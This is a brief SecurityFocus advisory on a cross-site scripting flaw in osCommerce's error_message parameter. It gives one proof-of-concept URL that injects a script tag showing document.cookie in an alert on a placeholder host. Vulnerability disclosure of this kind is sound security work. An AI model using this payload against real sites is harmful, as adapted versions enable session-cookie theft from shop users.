OSCommerce Error_Message Cross-Site Scripting Vulnerability

The following proof of concept was supplied:

http://www.example.com/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus